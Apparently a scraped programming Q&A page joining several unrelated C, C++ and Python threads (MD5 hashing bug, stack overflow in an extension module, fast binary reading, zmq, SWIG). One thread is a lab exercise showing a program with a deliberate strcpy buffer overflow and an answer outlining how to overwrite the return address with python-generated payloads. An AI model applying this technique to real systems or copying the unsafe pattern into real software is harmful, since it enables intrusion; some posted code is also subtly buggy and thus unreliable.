t.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <openssl/md5.h>
static char* unsigned_to_signed_char(const unsigned char* in , int len) {
char* res = (char*)malloc(len * 2 + 1);
int i = 0;
memset(res , 0 , len * 2 + 1);
while(i < len) {
sprintf(res + i * 2 , "%02x" , in[i]);
i ++;
};
return res;
}
static unsigned char * md5(const unsigned char * in) {
MD5_CTX ctx;
unsigned char * result1 = (unsigned char *)malloc(MD5_DIGEST_LENGTH);
MD5_Init(&ctx);
printf("len: %lu \n", strlen(in));
MD5_Update(&ctx, in, strlen(in));
MD5_Final(result1, &ctx);
return result1;
}
int main(int argc, char *argv[])
{
const char * i = "abcdef";
unsigned char * data = (unsigned char *)malloc(strlen(i) + 1);
strncpy(data, i, strlen(i));
unsigned char * result1 = md5(data);
free(data);
printf("%s\n", unsigned_to_signed_char(result1, MD5_DIGEST_LENGTH));
unsigned char * result2 = md5(result1);
free(result1);
printf("%s\n", unsigned_to_signed_char(result2, MD5_DIGEST_LENGTH));
unsigned char * result3 = md5(result2);
free(result2);
printf("%s\n", unsigned_to_signed_char(result3, MD5_DIGEST_LENGTH));
return 0;
}
makeflle
all:
cc t.c -Wall -L/usr/local/lib -lcrypto
and t.py
#!/usr/bin/env python
import hashlib
import binascii
src = 'abcdef'
a = hashlib.md5(src).digest()
b = hashlib.md5(a).digest()
c = hashlib.md5(b).hexdigest().upper()
print binascii.b2a_hex(a)
print binascii.b2a_hex(b)
print c
The results of python script on Debian6 x86 and MacOS 10.6 are the same:
e80b5017098950fc58aad83c8c14978e
b91282813df47352f7fe2c0c1fe9e5bd
85E4FBD1BD400329009162A8023E1E4B
the c version on MacOS is:
len: 6
e80b5017098950fc58aad83c8c14978e
len: 48
eac9eaa9a4e5673c5d3773d7a3108c18
len: 64
73f83fa79e53e9415446c66802a0383f
Why it is different from Debian6 ?
Debian environment:
gcc (Debian 4.4.5-8) 4.4.5
Python 2.6.6
Linux shuge-lab 2.6.26-2-686 #1 SMP Thu Nov 25 01:53:57 UTC 2010 i686 GNU/Linux
OpenSSL was installed from testing repository.
MacOS environment:
i686-apple-darwin10-gcc-4.2.1 (GCC) 4.2.1 (Apple Inc. build 5666) (dot 3)
Python 2.7.1
Darwin Lees-Box.local 10.7.0 Darwin Kernel Version 10.7.0: Sat Jan 29 15:17:16 PST 2011; root:xnu-1504.9.37~1/RELEASE_I386 i386
OpenSSL was installed from MacPort.
openssl #1.0.0d (devel, security)
OpenSSL SSL/TLS cryptography library
I think you are allocating bytes exactly for MD5 result, without ending \0. Then you are calculating MD5 of block of memory that starts with result from previous MD5 calculating but with some random bytes after it. You should allocate one byte more for result and set it to \0.
My proposal:
...
unsigned char * result1 = (unsigned char *)malloc(MD5_DIGEST_LENGTH + 1);
result1[MD5_DIGEST_LENGTH] = 0;
...
The answers so far don't seem to me to have stated the issue clearly enough. Specifically the problem is the line:
MD5_Update(&ctx, in, strlen(in));
The data block you pass in is not '\0' terminated, so the call to update may try to process further bytes beyond the end of the MD5_DIGEST_LENGTH buffer. In short, stop using strlen() to work out the length of an arbitrary buffer of bytes: you know how long the buffers are supposed to be so pass the length around.
You don't '\0' terminate the string you're passing to md5 (which I
suppose takes a '\0' terminated string, since you don't pass it the
length). The code
memset( data, 0, sizeof( strlen( i ) ) );
memcpy( data, i, strlen( i ) );
is completely broken: sizeof( strlen( i ) ) is the same as
sizeof( size_t ), 4 or 8 on typical machines. But you don't want the
memset anyway. Try replacing these with:
strcpy( data, i );
Or better yet:
std::string i( "abcdef" );
, then pass i.c_str() to md5 (and declare md5 to take a char
const*. (I'd use an std::vector<unsigned char> in md5() as well,
and have it return it. And unsigned_to_signed_char would take the
std::vector<unsigned char> and return std::string.)
Related
I'm writing a python extension module in C. Python stops running when I declare an array of structs greater than 4 elements in a function of that module.
I'm writing the module to increase performance.
I've declared 3 structs( "SKU", "Cromosoma", "Aptitud" ) and I want to create an array of Cromosoma, but when I try to create the array with more than 4 elements it breaks.
// need_for_speed.c extension module code
#include <Python.h>
#include <stdlib.h>
#define MAX_GENES_SIZE 2000
typedef struct{
char codigo[30];
double venta;
char nombre[100];
double categoria;
double peso;
double ubicacion_especifica;
double ubicacion_actual;
double ubicacion_a_mover;
double stock;
} SKU;
typedef struct{
double ubicaciones_rompe_regla;
double cercania_medio;
double desv_std_picks_x_seccion;
double peso_x_ubicacion;
} Aptitud;
typedef struct{
SKU genes[MAX_GENES_SIZE];
Aptitud aptitud;
int genes_size;
int edad;
}Cromosoma;
static PyObject* prueba(PyObject* self, PyObject* args){
Cromosoma a;
SKU s;
strcpy(s.codigo,"1212");
a.genes[0] = s;
Cromosoma poblacion[] = {a,a,a,a,a};
printf("codigo %s ", poblacion[0].genes[0].codigo);
return PyLong_FromDouble(1);
}
static PyMethodDef Methods[] = {
{"prueba", prueba, METH_NOARGS, "Prueba general"},
{ NULL, NULL, 0, NULL }
};
// Module Definition struct
static struct PyModuleDef need_for_speed = {
PyModuleDef_HEAD_INIT,
"need_for_speed",
"Modulo para aumento de la velocidad de procesamiento para el algoritmo genético",
-1,
Methods
};
// Initialize module
PyMODINIT_FUNC PyInit_need_for_speed(void)
{
PyObject *m;
m = PyModule_Create(&need_for_speed);
return m;
}
the setup.py to build this module:
from distutils.core import setup, Extension
setup(name = 'need_for_speed', version = '1.0',ext_modules = [Extension('need_for_speed', ['need_for_speed.c'])])
command to build module:
python setup.py build
when I call the function prueba:
import need_for_speed
i = need_for_speed.prueba()
python stops running without printing or returning anything, but if modify the array named "poblacion" in the "prueba" function to have only 4 elements it runs perfectly, returning 1 and printing "codigo 1212".
I'm using Windows BTW.
It's probably a stack overflow.
Let's see how large your structs are assuming they only take the size of the individual members (neglecting padding, etc.):
SKU: 7 doubles and 130 chars -> 7 * 8 bytes + 130 bytes -> 186 bytes
Aptitud: 4 doubles -> 4 * 8 bytes -> 32 bytes
Cromosoma: 2 ints, 1 Aptitud and 2000 SKU -> 2 * 4 bytes + 32 bytes + 2000 * 186 bytes -> 372040 bytes
So one instance of Chromosoma will take ~370kB. And you create 5/6 of them; one with Cromosoma a; and one for each slot in the array: 4/5.
A typical stack will be only a few megabytes. With 6 * 370kB ~ 2.1MB it's at least reasonable that you exhausted your stack. For example MSVC (Windows Visual Studio C/C++ compiler) by default uses just 1 MB. Given that it fails with an array of size 5 but works with one of size 4 it seems that you have ~2 MB of stack.
To avoid this problem you could increase your stack size (how you do that depends on your compiler). However increasing the stack size will again lead to problems when you need more Chromosoma or change the number of SKUs.
Another alternative (probably better than increasing the stack size) would be to allocate all big arrays on the heap. For example you could allocate the poblacion on the heap - and/or make the Chromosoma.genes a pointer to an array of SKU.
Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 3 years ago.
Improve this question
I’m reading a file in C++ and Python as a binary file. I need to divide the binary into blocks, each 6 bytes. For example, if my file is 600 bytes, the result should be 100 blocks, each 6 bytes.
I have tried struct (in C++ and Python) and array (Python). None of them divide the binary into blocks of 6 bytes. They can only divide the binary into blocks each power of two (1, 2, 4, 8, 16, etc.).
The array algorithm was very fast, reading 1 GB of binary data in less than a second as blocks of 4 bytes. In contrast, I used some other methods, but all of them are extremely slow, taking tens of minutes to do it for a few megabytes.
How can I read the binary as blocks of 6 bytes as fast as possible? Any help in either C++ or Python will be great. Thank you.
EDIT - The Code:
struct Block
{
char data[6];
};
class BinaryData
{
private:
char data[6];
public:
BinaryData() {};
~BinaryData() {};
void readBinaryFile(string strFile)
{
Block block;
ifstream binaryFile;
int size = 0;
binaryFile.open(strFile, ios::out | ios::binary);
binaryFile.seekg(0, ios::end);
size = (int)binaryFile.tellg();
binaryFile.seekg(0, ios::beg);
cout << size << endl;
while ( (int)binaryFile.tellg() < size )
{
cout << binaryFile.tellg() << " , " << size << " , " <<
size - (int)binaryFile.tellg() << endl;
binaryFile.read((char*)block.data,sizeof(block.data));
cout << block.data << endl;
//cin >> block.data;
if (size - (int)binaryFile.tellg() > size)
{
break;
}
}
binaryFile.close();
}
};
Notes :
in the file the numbers are in big endian ( remark )
the goal is to as fast as possible read them then sort them in ascending order ( remark )
Let's start simple, then optimize.
Simple Loop
uint8_t array1[6];
while (my_file.read((char *) &array1[0], 6))
{
Process_Block(&array1[0]);
}
The above code reads in a file, 6 bytes at a time and sends the block to a function.
Meets the requirements, not very optimal.
Reading Larger Blocks
Files are streaming devices. They have an overhead to start streaming, but are very efficient to keep streaming. In other words, we want to read as much data per transaction to reduce the overhead.
static const unsigned int CAPACITY = 6 * 1024;
uint8_t block1[CAPACITY];
while (my_file.read((char *) &block1[0], CAPACITY))
{
const size_t bytes_read = my_file.gcount();
const size_t blocks_read = bytes_read / 6;
uint8_t const * block_pointer = &block1[0];
while (blocks_read > 0)
{
Process_Block(block_pointer);
block_pointer += 6;
--blocks_read;
}
}
The above code reads up to 1024 blocks in one transaction. After reading, each block is sent to a function for processing.
This version is more efficient than the Simple Loop, as it reads more data per transaction. Adjust the CAPACITY to find the optimal size on your platform.
Loop Unrolling
The previous code reduces the first bottleneck of input transfer speed (although there is still room for optimization). Another technique is to reduce the overhead of the processing loop by performing more data processing inside the loop. This is called loop unrolling.
const size_t bytes_read = my_file.gcount();
const size_t blocks_read = bytes_read / 6;
uint8_t const * block_pointer = &block1[0];
while ((blocks_read / 4) != 0)
{
Process_Block(block_pointer);
block_pointer += 6;
Process_Block(block_pointer);
block_pointer += 6;
Process_Block(block_pointer);
block_pointer += 6;
Process_Block(block_pointer);
block_pointer += 6;
blocks_read -= 4;
}
while (blocks_read > 0)
{
Process_Block(block_pointer);
block_pointer += 6;
--blocks_read;
}
You can adjust the quantity of operations in the loop, to see how it affects your program's speed.
Multi-Threading & Multiple Buffers
Another two techniques for speeding up the reading of the data, are to use multiple threads and multiple buffers.
One thread, an input thread, reads the file into a buffer. After reading into the first buffer, the thread sets a semaphore indicating there is data to process. The input thread reads into the next buffer. This repeats until the data is all read. (For a challenge, figure out how to reuse the buffers and notify the other thread of which buffers are available).
The second thread is the processing thread. This processing thread is started first and waits for the first buffer to be completely read. After the buffer has the data, the processing thread starts processing the data. After the first buffer has been processed, the processing thread starts on the next buffer. This repeats until all the buffers have been processed.
The goal here is to use as many buffers as necessary to keep the processing thread running and not waiting.
Edit 1: Other techniques
Memory Mapped Files
Some operating systems support memory mapped files. The OS reads a portion of the file into memory. When a location outside the memory is accessed, the OS loads another portion into memory. Whether this technique improves performance needs to be measured (profiled).
Parallel Processing & Threading
Adding multiple threads may show negligible performance gain. Computers have a data bus (data highway) connecting many hardware devices, including memory, file I/O and the processor. Devices will be paused to let other devices use the data highway. With multiple cores or processors, one processor may have to wait while the other processor is using the data highway. This waiting may cause negligible performance gain when using multiple threads or parallel processing. Also, the operating system has overhead when constructing and maintaining threads.
Try that, the input file is received in argument of the program, as you said I suppose the the 6 bytes values in the file are written in the big endian order, but I do not make assumption for the program reading the file then sorting and it can be executed on both little and big endian (I check the case at the execution)
#include <iostream>
#include <fstream>
#include <vector>
#include <cstdint>
#include <algorithm>
#include <limits.h> // CHAR_BIT
using namespace std;
#if CHAR_BIT != 8
# error that code supposes a char has 8 bits
#endif
int main(int argc, char ** argv)
{
if (argc != 2)
cerr << "Usage: " << argv[1] << " <file>" << endl;
else {
ifstream in(argv[1], ios::binary);
if (!in.is_open())
cerr << "Cannot open " << argv[1] << endl;
else {
in.seekg(0, ios::end);
size_t n = (size_t) in.tellg() / 6;
vector<uint64_t> values(n);
uint64_t * p = values.data(); // for performance
uint64_t * psup = p + n;
in.seekg(0, ios::beg);
int i = 1;
if (*((char *) &i)) {
// little endian
unsigned char s[6];
uint64_t v = 0;
while (p != psup) {
if (!in.read((char *) s, 6))
return -1;
((char *) &v)[0] = s[5];
((char *) &v)[1] = s[4];
((char *) &v)[2] = s[3];
((char *) &v)[3] = s[2];
((char *) &v)[4] = s[1];
((char *) &v)[5] = s[0];
*p++ = v;
}
}
else {
// big endian
uint64_t v = 0;
while (p != psup) {
if (!in.read(((char *) &v) + 2, 6))
return -1;
*p++ = v;
}
}
cout << "file successfully read" << endl;
sort(values.begin(), values.end());
cout << "values sort" << endl;
// DEBUG, DO ON A SMALL FILE ;-)
for (auto v : values)
cout << v << endl;
}
}
}
So, I'm trying to exploit this program that has a buffer overflow vulnerability to get/return a secret behind a locked .txt (read_secret()).
vulnerable.c //no edits here
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
void read_secret() {
FILE *fptr = fopen("/task2/secret.txt", "r");
char secret[1024];
fscanf(fptr, "%512s", secret);
printf("Well done!\nThere you go, a wee reward: %s\n", secret);
exit(0);
}
int fib(int n)
{
if ( n == 0 )
return 0;
else if ( n == 1 )
return 1;
else
return ( fib(n-1) + fib(n-2) );
}
void vuln(char *name)
{
int n = 20;
char buf[1024];
int f[n];
int i;
for (i=0; i<n; i++) {
f[i] = fib(i);
}
strcpy(buf, name);
printf("Welcome %s!\n", buf);
for (i=0; i<20; i++) {
printf("By the way, the %dth Fibonacci number might be %d\n", i, f[i]);
}
}
int main(int argc, char *argv[])
{
if (argc < 2) {
printf("Tell me your names, tricksy hobbitses!\n");
return 0;
}
// printf("main function at %p\n", main);
// printf("read_secret function at %p\n", read_secret);
vuln(argv[1]);
return 0;
}
attack.c //to be edited
#!/usr/bin/env bash
/task2/vuln "$(python -c "print 'a' * 1026")"
I know I can cause a segfault if I print large enough string, but that doesn't get me anywhere. I'm trying to get the program to execute read_secret by overwriting the return address on the stack, and returns to the read_secret function, instead of back to main.
But I'm pretty stuck here. I know I would have to use GDB to get the address of the read_secret function, but I'm kinda confused. I know that I would have to replace the main() address with the read_secret function's address, but I'm not sure how.
Thanks
If you want to execute a function through a buffer overflow vulnerability you have to first identify the offset at which you can get a segfault. In your case I assume its 1026. The whole game is to overwrite the eip(what tells the program what to do next) and then add your own instruction.
To add your own instruction you need to know the address of said instruction and then so in gdb open your program and then type in:
x function name
Then copy the address. You then have to convert it to big or little endian format. I do it with the struct module in python.
import struct
struct.pack("<I", address) # for little endian for big endian its different
Then you have to add it to your input to the binary so something like:
python -c "print 'a' * 1026 + 'the_address'" | /task2/vuln
#on bash shell, not in script
If all of this doesnt work then just add a few more characters to your offset. There might be something you didnt see coming.
python -c "print 'a' * 1034 + 'the_address'" | /task2/vuln
Hope that answers your question.
I want to serialize raw image data i.e. uint16 array, and send it over to python using zmq. I am considered using msgPack-c but the only way I found was something like given How do I unpack and extract data properly using msgpack-c?.
if I follow this approach I have to pack each element in my C array separately, which will make it very slow.
Could someone please point to the right direction.
You can send uint16_t array from c side as is, and use ctypes module to access it in python code.
Sending c code:
#include <stdint.h>
#include <stdio.h>
#include <zmq.h>
#define IMAGE_SIZE (256 * 256)
unsigned checksum(uint16_t* data, int len) {
unsigned s = 0;
for (int i = 0; i < len; ++i) {
s += data[i];
}
return s;
}
int main() {
uint16_t image[IMAGE_SIZE];
printf("image checksum: %i\n", checksum(image, IMAGE_SIZE));
void* context = zmq_ctx_new();
void* push = zmq_socket(context, ZMQ_PUSH);
zmq_connect(push, "tcp://127.0.0.1:5555");
zmq_send(push, image, IMAGE_SIZE * sizeof(uint16_t), 0);
zmq_close(push);
zmq_ctx_destroy(context);
return 0;
}
Receiving python code:
from ctypes import c_uint16
import zmq
IMAGE_SIZE = 256 * 256
Image = c_uint16 * IMAGE_SIZE # corresponds to uint16_t[IMAGE_SIZE]
context = zmq.Context(1)
pull = zmq.Socket(context, zmq.PULL)
pull.bind("tcp://127.0.0.1:5555")
message = pull.recv()
image = Image.from_buffer_copy(message)
# This should print the same number as the sending code
# Note that it is different from sum(message)
print(sum(image))
This may be a noob question but here it goes. I have wrapped a 3d vector into a python module using SWIG. Everything has compiled and I can import the module and perform actions with it. I can't seem to figure out how to access my vector in python to store and change values in it. How do I store and change my vector values in python. My code is below and was written to test if the algorithm stl works with SWIG. It does seem to work but I need to be able to put values into my vector with python.
header.h
#ifndef HEADER_H_INCLUDED
#define HEADER_H_INCLUDED
#include <vector>
using namespace std;
struct myStruct{
int vecd1, vecd2, vecd3;
vector<vector<vector<double> > >vec3d;
void vecSizer();
void deleteDuplicates();
double vecSize();
void run();
};
#endif // HEADER_H_INCLUDED
main.cpp
#include "header.h"
#include <vector>
#include <algorithm>
void myStruct::vecSizer()
{
vec3d.resize(vecd1);
for(int i = 0; i < vec3d.size(); i++)
{
vec3d[i].resize(vecd2);
for(int j = 0; j < vec3d[i].size(); j++)
{
vec3d[i][j].resize(vecd3);
}
}
}
void myStruct::deleteDuplicates()
{
vector<vector<vector<double> > >::iterator it;
sort(vec3d.begin(),vec3d.end());
it = unique(vec3d.begin(),vec3d.end());
vec3d.resize(distance(vec3d.begin(), it));
}
double myStruct::vecSize()
{
return vec3d.size();
}
void myStruct::run()
{
vecSizer();
deleteDuplicates();
vecSize();
}
from the terminal (Ubuntu)
import test #import the SWIG generated module
x = test.myStruct() #create an instance of myStruct
x.vecSize() #run vecSize() should be 0 since vector dimensions are not initialized
0.0
x.vec3d #see if vec3d exists and is of the correct type
<Swig Object of type 'vector< vector< vector< double > > > *' at 0x7fe6a483c8d0>
Thanks in advance!
It turns out that vectors are converted to immutable python objects when the wrapper/interface is generated. So in short you cannot modify wrapped c++ vectors from python.